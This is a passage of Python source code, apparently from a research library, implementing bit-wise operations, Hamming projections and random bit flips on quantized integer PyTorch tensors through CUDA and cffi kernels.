cffi.lib.cffi_int16and(_n, _a, _b, _c)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
_c = cffi.ffi.cast('char*', c.data_ptr())
cffi.lib.cffi_int8and(_n, _a, _b, _c)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
_c = cffi.ffi.cast('unsigned char*', c.data_ptr())
cffi.lib.cffi_uint8and(_n, _a, _b, _c)
else:
raise NotImplementedError
elif name == 'or':
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
_c = cffi.ffi.cast('int*', c.data_ptr())
cffi.lib.cffi_int32or(_n, _a, _b, _c)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
_c = cffi.ffi.cast('short*', c.data_ptr())
cffi.lib.cffi_int16or(_n, _a, _b, _c)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
_c = cffi.ffi.cast('char*', c.data_ptr())
cffi.lib.cffi_int8or(_n, _a, _b, _c)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
_c = cffi.ffi.cast('unsigned char*', c.data_ptr())
cffi.lib.cffi_uint8or(_n, _a, _b, _c)
else:
raise NotImplementedError
elif name == 'xor':
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
_c = cffi.ffi.cast('int*', c.data_ptr())
cffi.lib.cffi_int32xor(_n, _a, _b, _c)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
_c = cffi.ffi.cast('short*', c.data_ptr())
cffi.lib.cffi_int16xor(_n, _a, _b, _c)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
_c = cffi.ffi.cast('char*', c.data_ptr())
cffi.lib.cffi_int8xor(_n, _a, _b, _c)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
_c = cffi.ffi.cast('unsigned char*', c.data_ptr())
cffi.lib.cffi_uint8xor(_n, _a, _b, _c)
else:
raise NotImplementedError
else:
raise NotImplementedError()
return c
def int_and(a, b):
"""
Bit-wise and between float tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: first tensor
:type b: torch.Tensor
:return: bit-wise and
:rtype: torch.Tensor
"""
return int_bitwise_operation(a, b, 'and')
def int_or(a, b):
"""
Bit-wise and between float tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: first tensor
:type b: torch.Tensor
:return: bit-wise and
:rtype: torch.Tensor
"""
return int_bitwise_operation(a, b, 'or')
def int_xor(a, b):
"""
Bit-wise and between float tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: first tensor
:type b: torch.Tensor
:return: bit-wise and
:rtype: torch.Tensor
"""
return int_bitwise_operation(a, b, 'xor')
def int_msb_projection(original, perturbed):
"""
Bit-wise and between float tensors.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:return: msb projection of perturbed onto original
:rtype: torch.Tensor
"""
if not original.is_contiguous():
original = original.contiguous()
if not perturbed.is_contiguous():
perturbed = perturbed.contiguous()
check_type(original, perturbed)
cuda = is_cuda(original)
assert is_cuda(perturbed) is cuda
assert len(original.shape) == len(perturbed.shape), (original.shape, perturbed.shape)
for d in range(len(original.shape)):
assert original.shape[d] == perturbed.shape[d], (original.shape, perturbed.shape, d)
output = torch.zeros_like(original)
n = original.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(original.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%smsbprojection' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
original.data_ptr(),
perturbed.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
if type == 'int32':
_original = cffi.ffi.cast('int*', original.data_ptr())
_perturbed = cffi.ffi.cast('int*', perturbed.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32msbprojection(_n, _original, _perturbed, _output)
elif type == 'int16':
_original = cffi.ffi.cast('short*', original.data_ptr())
_perturbed = cffi.ffi.cast('short*', perturbed.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16msbprojection(_n, _original, _perturbed, _output)
elif type == 'int8':
_original = cffi.ffi.cast('char*', original.data_ptr())
_perturbed = cffi.ffi.cast('char*', perturbed.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8msbprojection(_n, _original, _perturbed, _output)
elif type == 'uint8':
_original = cffi.ffi.cast('unsigned char*', original.data_ptr())
_perturbed = cffi.ffi.cast('unsigned char*', perturbed.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8msbprojection(_n, _original, _perturbed, _output)
else:
raise NotImplementedError
return output
def int_hamming_projection(original, perturbed, epsilon, method='topk'):
"""
Hamming projection with an additional hamming constraint of 1 per word.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:param epsilon: epsilon
:type epsilon: int
:param method: method to use
:type method: str
:return: msb projection of perturbed onto original
:rtype: torch.Tensor
"""
if method == 'sort':
return int_hamming_projection_sort(original, perturbed, epsilon)
elif method == 'topk':
return int_hamming_projection_topk(original, perturbed, epsilon)
else:
raise NotImplementedError
def int_hamming_projection_topk(original, perturbed, epsilon):
"""
Hamming projection with an additional hamming constraint of 1 per word.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:param epsilon: epsilon
:type epsilon: int
:return: msb projection of perturbed onto original
:rtype: torch.Tensor
"""
# assert epsilon >= 0
# https://stackoverflow.com/questions/51433741/rearranging-a-3-d-array-using-indices-from-sorting
# size = list(tensor.shape)
# sorted, indices = torch.sort(tensor.view(tensor.size()[0], -1), dim=1, descending=True)
# k = int(math.ceil(epsilon))
# assert k > 0
# sorted[:, min(k, sorted.size(1) - 1):] = 0
# print(sorted)
# tensor = tensor.scatter_(dim=1, index=indices, src=sorted)
# tensor = tensor.view(size)
if not original.is_contiguous():
original = original.contiguous()
if not perturbed.is_contiguous():
perturbed = perturbed.contiguous()
check_type(original, perturbed)
cuda = is_cuda(original)
assert is_cuda(perturbed) is cuda
assert len(original.shape) == len(original.shape), (original.shape, perturbed.shape)
for d in range(len(original.shape)):
assert original.shape[d] == perturbed.shape[d], (original.shape, perturbed.shape, d)
size = original.shape
original = original.view(-1)
perturbed = perturbed.view(-1)
assert epsilon >= 0, epsilon
perturbed_float = torch.clone(perturbed).float()
original_float = torch.clone(original).float()
difference = torch.abs(perturbed_float - original_float)
k = int(math.ceil(epsilon))
k = min(k, difference.size(0) - 1)
assert k > 0, k
_, top_indices = topk(difference, k=k)
projection_top_original = original[top_indices]
projection_top_perturbed = perturbed[top_indices]
projection_top_projected = int_msb_projection(projection_top_original, projection_top_perturbed)
#projection_top_projected = projection_top_perturbed
projected = torch.clone(original)
projected[top_indices] = projection_top_projected
return projected.view(size)
def int_hamming_projection_sort(original, perturbed, epsilon):
"""
Hamming projection with an additional hamming constraint of 1 per word.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:param epsilon: epsilon
:type epsilon: int
:return: msb projection of perturbed onto original
:rtype: torch.Tensor
"""
# assert epsilon >= 0
# https://stackoverflow.com/questions/51433741/rearranging-a-3-d-array-using-indices-from-sorting
# size = list(tensor.shape)
# sorted, indices = torch.sort(tensor.view(tensor.size()[0], -1), dim=1, descending=True)
# k = int(math.ceil(epsilon))
# assert k > 0
# sorted[:, min(k, sorted.size(1) - 1):] = 0
# print(sorted)
# tensor = tensor.scatter_(dim=1, index=indices, src=sorted)
# tensor = tensor.view(size)
if not original.is_contiguous():
original = original.contiguous()
if not perturbed.is_contiguous():
perturbed = perturbed.contiguous()
check_type(original, perturbed)
cuda = is_cuda(original)
assert is_cuda(perturbed) is cuda
assert len(original.shape) == len(original.shape), (original.shape, perturbed.shape)
for d in range(len(original.shape)):
assert original.shape[d] == perturbed.shape[d], (original.shape, perturbed.shape, d)
size = original.shape
original = original.view(-1)
perturbed = perturbed.view(-1)
assert epsilon >= 0, epsilon
difference = torch.abs(perturbed - original)
sorted_difference, sorted_indices = torch.sort(difference, descending=True)
sorted_original = torch.gather(original, dim=0, index=sorted_indices)
# will hold the projection later
sorted_projected = torch.gather(perturbed, dim=0, index=sorted_indices)
# print(original)
# print(perturbed)
# print(difference)
# print(sorted_original)
# print(sorted_projected)
# print(sorted_difference)
k = int(math.ceil(epsilon))
k = min(k, sorted_difference.size(0) - 1)
assert k > 0, k
projection_sorted_original = sorted_original[:k]
projection_sorted_perturbed = sorted_projected[:k]
projection_sorted_projected = int_msb_projection(projection_sorted_original, projection_sorted_perturbed)
sorted_projected[:k] = projection_sorted_projected
sorted_projected[k:] = sorted_original[k:]
# sorted_projected[k:] = 0
# print('---')
# print(sorted_projected)
# projected = torch.zeros_like(sorted_projected).scatter_(dim=0, index=sorted_indices, src=sorted_projected)
projected = torch.scatter(sorted_projected, dim=0, index=sorted_indices, src=sorted_projected)
# print(projected)
return projected.view(size)
def int_hamming_distance(a, b):
"""
Bit-wise and between float tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: first tensor
:type b: torch.Tensor
:return: bit-wise and
:rtype: torch.Tensor
"""
if not a.is_contiguous():
a = a.contiguous()
if not b.is_contiguous():
b = b.contiguous()
check_type(a, b)
cuda = is_cuda(a)
assert is_cuda(b) is cuda
assert len(a.shape) == len(b.shape), (a.shape, b.shape)
for d in range(len(a.shape)):
assert a.shape[d] == b.shape[d], (a.shape, b.shape, d)
if cuda:
dist = torch.cuda.IntTensor(a.shape).fill_(0)
else:
dist = torch.IntTensor(a.shape).fill_(0)
n = a.nelement()
shape = list(dist.shape)
grid, block = cupy.grid_block(shape)
type = str(a.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%shammingdistance' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
a.data_ptr(),
b.data_ptr(),
dist.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_dist = cffi.ffi.cast('int*', dist.data_ptr())
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
cffi.lib.cffi_int32hammingdistance(_n, _a, _b, _dist)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
cffi.lib.cffi_int16hammingdistance(_n, _a, _b, _dist)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
cffi.lib.cffi_int8hammingdistance(_n, _a, _b, _dist)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
cffi.lib.cffi_uint8hammingdistance(_n, _a, _b, _dist)
else:
raise NotImplementedError
return dist
# 0.5^9
INT32_FAST_RANDOM_FLIP_0001953125 = '&&&&&&&&'
# 0.5^8 * 0.75
INT32_FAST_RANDOM_FLIP_0002929688 = '|&&&&&&&&'
# 0.5^8
INT32_FAST_RANDOM_FLIP_000390625 = '&&&&&&&'
# 0.5^7 * 0.75
INT32_FAST_RANDOM_FLIP_0005859375 = '|&&&&&&&'
# 0.5^7
INT32_FAST_RANDOM_FLIP_00078125 = '&&&&&&'
# 0.5^6 * 0.75
INT32_FAST_RANDOM_FLIP_001171875 = '|&&&&&&'
# 0.5^6
INT32_FAST_RANDOM_FLIP_0015625 = '&&&&&'
# 0.5^5 * 0.75
INT32_FAST_RANDOM_FLIP_00234375 = '|&&&&&'
# 0.5^5
INT32_FAST_RANDOM_FLIP_003125 = '&&&&'
def int_fast_random_flip(input, prob=INT32_FAST_RANDOM_FLIP_001171875, protected_bits=[0]*32):
"""
Fast version of random int32 bit flips supporting only specific flip probabilities.
Inspired by https://stackoverflow.com/questions/35795110/fast-way-to-generate-pseudo-random-bits-with-a-given-probability-of-0-or-1-for-e/35811904#35811904.
Protected bits will be ensured by converting protected_bits to int, and then anding the mask with it before applying xor for bit flips.
Important: underestimates probabilities slightly!
:param input: input tensor
:type input: torch.Tensor
:param prob: probability of a flip per bit
:type prob: float
:param protected_bits:
:param protected_bits: list of length 32, indicating whether a bit can be flipped (1) or not (0)
:type protected_bits: [int]
:return: input with random bit flips
:rtype: torch.Tensor
"""
# assert (input.is_contiguous() == True)
if not input.is_contiguous():
input = input.contiguous()
assert (input.dtype == torch.int32)
assert prob in [
INT32_FAST_RANDOM_FLIP_0001953125,
INT32_FAST_RANDOM_FLIP_0002929688,
INT32_FAST_RANDOM_FLIP_000390625,
INT32_FAST_RANDOM_FLIP_0005859375,
INT32_FAST_RANDOM_FLIP_00078125,
INT32_FAST_RANDOM_FLIP_001171875,
INT32_FAST_RANDOM_FLIP_0015625,
INT32_FAST_RANDOM_FLIP_00234375,
INT32_FAST_RANDOM_FLIP_003125,
]
def generator(pattern, size, cuda=False):
if cuda:
r = torch.cuda.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
else:
r = torch.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
for i in range(len(pattern)):
if cuda:
a = torch.cuda.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
else:
a = torch.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
if pattern[i] == '&':
r = int_and(r, a)
elif pattern[i] == '|':
r = int_or(r, a)
return r
bits = ''
for protected_bit in protected_bits:
if protected_bit == 1:
bits += '0'
else:
bits += '1'
protected = int(bits, 2)
size = list(input.shape)
protected = torch.ones(size, dtype=torch.int32)*protected
if is_cuda(input):
protected = protected.cuda()
random = generator(prob, size, cuda=is_cuda(input))
random = int_and(random, protected)
output = int_xor(input, random)
return output
def int_flip(input, mask, precision=None):
"""
Flip bits in input according to mask
:param input: input tensor
:type input: torch.Tensor
:param mask: boolean mask
:type: mask: torch.Tensor
:return: input with random bit flips
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not mask.is_contiguous():
mask = mask.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
assert (mask.dtype == torch.bool)
assert is_cuda(mask) is cuda
assert len(input.shape) + 1 == len(mask.shape), (input.shape, mask.shape)
for d in range(len(input.shape)):
assert input.shape[d] == mask.shape[d], (input.shape, mask.shape, d)
assert mask.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sflip' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
mask.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_mask = cffi.ffi.cast('bool*', mask.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32flip(_n, _mask, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16flip(_n, _mask, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8flip(_n, _mask, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8flip(_n, _mask, _input, _output)
else:
raise NotImplementedError
return output
def int_set_zero(input, m, precision=None):
"""
Set the m LSBs to zero.
:param input: input tensor
:type input: torch.Tensor
:param m: number of LSBs
:type m: int
:return: input with m LBSs set to zero
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
assert m <= precision
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%ssetzero' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
m,
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_m = cffi.ffi.cast('int*', m)
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32setzero(_n, _m, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16setzero(_n, _m, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8setzero(_n, _m, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8setzero(_n, _m, _input, _output)
else:
raise NotImplementedError
return output
def int_set(input, set1, set0, precision=None):
"""
Flip bits in input according to mask
:param input: input tensor
:type input: torch.Tensor
:param set1: boolean mask to set to 1
:type: set1: torch.Tensor
:param set0: boolean mask to set to 0
:type set0: torch.Tensor
:return: input with random bit flips
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not set1.is_contiguous():
set1 = set1.contiguous()
if not set0.is_contiguous():
set0 = set0.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
assert (set1.dtype == torch.bool)
assert is_cuda(set1) is cuda
assert (set0.dtype == torch.bool)
assert is_cuda(set0) is cuda
assert len(input.shape) + 1 == len(set1.shape), (input.shape, set1.shape)
assert len(input.shape) + 1 == len(set0.shape), (input.shape, set0.shape)
for d in range(len(input.shape)):
assert input.shape[d] == set1.shape[d], (input.shape, set1.shape, d)
assert input.shape[d] == set0.shape[d], (input.shape, set0.shape, d)
assert set1.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert set0.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sset' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
set1.data_ptr(),
set0.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_set1 = cffi.ffi.cast('bool*', set1.data_ptr())
_set0 = cffi.ffi.cast('bool*', set0.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32set(_n, _set1, _set0, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16set(_n, _set1, _set0, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8set(_n, _set1, _set0, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8set(_n, _set1, _set0, _input, _output)
else:
raise NotImplementedError
return output
def int_random_flip(input, zero_prob=0.1, one_prob=0.1, protected_bits=[0]*32, rand=None, precision=None):
"""
Randomly flip bits in a int32 tensor with the given probability to flip zeros or ones.
Note that for zero and one probability of 0.1, the actually changed values are roughly a fraction of 0.075;
in contrast to 0.092 for the cupy version.
:param input: input tensor
:type input: torch.Tensor
:param rand: optional tensor holding random value per bit, shape is input.shape + [32]
:type: rand: torch.Tensor
:param zero_prob: probability to flip a zero
:type zero_prob: float
:param one_prob: probability to flip a one
:type one_prob: float
:param protected_bits: list of length 32, indicating whether a bit can be flipped (1) or not (0)
:type protected_bits: [int]
:return: input with random bit flips
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
zero_prob = torch.tensor(zero_prob, dtype=torch.float)
one_prob = torch.tensor(one_prob, dtype=torch.float)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
zero_prob = zero_prob.cuda()
one_prob = one_prob.cuda()
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%srandomflip' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_masked_random_flip(input, mask, zero_prob=0.1, one_prob=0.1, protected_bits=[0]*32, rand=None, precision=None):
"""
Randomly flip bits in a int32 tensor with the given probability to flip zeros or ones.
The mask decides which values are subject to bit flips and which are not.
Note that for zero and one probability of 0.1, the actually changed values are roughly a fraction of 0.075;
in contrast to 0.092 for the cupy version.
:param input: input tensor
:type input: torch.Tensor
:param mask: mask tensor, determining which values can be changed
:type mask: torch.Tensor
:param rand: optional tensor holding random value per bit, shape is input.shape + [32]
:type: rand: torch.Tensor
:param zero_prob: probability to flip a zero
:type zero_prob: float
:param one_prob: probability to flip a one
:type one_prob: float
:param protected_bits: list of length 32, indicating whether a bit can be flipped (1) or not (0)
:type protected_bits: [int]
:return: input with random bit flips
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not mask.is_contiguous():
mask = mask.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert (mask.dtype == torch.bool)
assert is_cuda(mask) is cuda
assert len(input.shape) == len(mask.shape), (input.shape, mask.shape)
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert input.shape[d] == mask.shape[d], (input.shape, mask.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
zero_prob = torch.tensor(zero_prob, dtype=torch.float)
one_prob = torch.tensor(one_prob, dtype=torch.float)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
zero_prob = zero_prob.cuda()
one_prob = one_prob.cuda()
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%smaskedrandomflip' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
mask.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_mask = cffi.ffi.cast('bool*', mask.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_individual_random_flip(input, zero_prob, one_prob, protected_bits=[0]*32, rand=None, precision=None):
"""
Randomly flip bits in a int32 tensor with the given probability to flip zeros or ones.
Note that for zero and one probability of 0.1, the actually changed values are roughly a fraction of 0.075;
in contrast to 0.092 for the cupy version.
:param input: input tensor
:type input: torch.Tensor
:param rand: optional tensor holding random value per bit, shape is input.shape + [32]
:type: rand: torch.Tensor
:param zero_prob: tensor for per-bit probabilities to flip a zero
:type zero_prob: torch.Tensor
:param one_prob: tensor of per-bit probabilities to flip a one
:type one_prob: torch.Tensor
:param protected_bits: list of length 32, indicating whether a bit can be flipped (1) or not (0)
:type protected_bits: [int]
:return: input with random bit flips
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not zero_prob.is_contiguous():
zero_prob = zero_prob.contiguous()
if not one_prob.is_contiguous():
one_prob = one_prob.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert (zero_prob.dtype == torch.float)
